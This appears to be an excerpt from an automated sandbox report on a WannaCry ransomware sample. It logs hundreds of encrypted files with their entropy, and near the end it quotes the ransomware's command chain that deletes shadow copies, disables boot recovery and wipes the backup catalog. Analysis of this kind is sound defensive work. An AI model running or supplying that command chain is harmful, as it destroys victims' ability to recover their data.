                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT entropy: 7.99346982266Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002a.db.WNCRYT entropy: 7.99824426072Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99970885509Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Intel\GCC\IGCCSvc.db.WNCRYT entropy: 7.9901450839Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRYT entropy: 7.99837723765Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.99823882225Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRYT entropy: 7.99849234073Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT entropy: 7.99985157337Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129448402381.txt.WNCRYT entropy: 7.99847646983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99967694781Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286164541279846.txt.WNCRYT entropy: 7.99857204938Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRYT entropy: 7.99936251983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRYT entropy: 7.99923580578Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99971679466Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20230515092412.txt.WNCRYT entropy: 7.99954782409Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99978659953Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.9937386897Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT entropy: 7.99233215535Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT entropy: 7.99999171308Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT entropy: 7.99905807863Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRYT entropy: 7.99944357781Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT entropy: 7.99792862115Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRYT entropy: 7.99927921284Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT entropy: 7.99607318227Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRYT entropy: 7.99257596064Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT entropy: 7.99225861509Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRYT entropy: 7.993655518Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT entropy: 7.99842382893Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20230515092412.txt.WNCRYT entropy: 7.99764288179Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT entropy: 7.9952889667Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99536048928Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT entropy: 7.99866536384Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5a1caf4e-992d-4eb4-b7f3-9cfc9fd49e6a}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99486634929Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT entropy: 7.99365012525Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99529194446Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99947041738Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRYT entropy: 7.99987283047Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT entropy: 7.99944224926Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRYT entropy: 7.99969835961Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRYT entropy: 7.99606755907Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.99968101244Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRYT entropy: 7.99829496617Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT entropy: 7.99964290826Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99925438629Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT entropy: 7.99993437071Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99915256324Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\IconCache.db.WNCRYT entropy: 7.99321607944Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRYT entropy: 7.99910724454Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRYT entropy: 7.99522164688Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRYT entropy: 7.99923557165Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRYT entropy: 7.99658852005Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRYT entropy: 7.99865279881Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRYT entropy: 7.99812943656Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRYT entropy: 7.99879826603Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRYT entropy: 7.99866035771Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRYT entropy: 7.99729696186Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRYT entropy: 7.99593774407Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRYT entropy: 7.99891268405Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRYT entropy: 7.99518345101Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRYT entropy: 7.99579452207Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRYT entropy: 7.99980132208Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRYT entropy: 7.99798692127Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRYT entropy: 7.99902849922Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRYT entropy: 7.99009081156Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRYT entropy: 7.99763460399Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\WannaCry.cmd.WNCRY (copy) entropy: 7.99996970245Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99959558772Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy) entropy: 7.99934672494Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy) entropy: 7.99775079875Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy) entropy: 7.99929003447Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy) entropy: 7.99310922542Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy) entropy: 7.99886987358Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy) entropy: 7.99346982266Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99970885509Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRY (copy) entropy: 7.99837723765Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRY (copy) entropy: 7.99849234073Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129448402381.txt.WNCRY (copy) entropy: 7.99847646983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286164541279846.txt.WNCRY (copy) entropy: 7.99857204938Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRY (copy) entropy: 7.99936251983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRY (copy) entropy: 7.99923580578Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20230515092412.txt.WNCRY (copy) entropy: 7.99954782409Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRY (copy) entropy: 7.99944357781Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRY (copy) entropy: 7.99927921284Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRY (copy) entropy: 7.99257596064Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRY (copy) entropy: 7.993655518Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20230515092412.txt.WNCRY (copy) entropy: 7.99764288179Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99536048928Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5a1caf4e-992d-4eb4-b7f3-9cfc9fd49e6a}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99486634929Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99529194446Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRY (copy) entropy: 7.99987283047Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRY (copy) entropy: 7.99969835961Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRY (copy) entropy: 7.99606755907Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99829496617Jump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,25_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,28_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,37_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: @WanaDecryptor@.exe Binary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
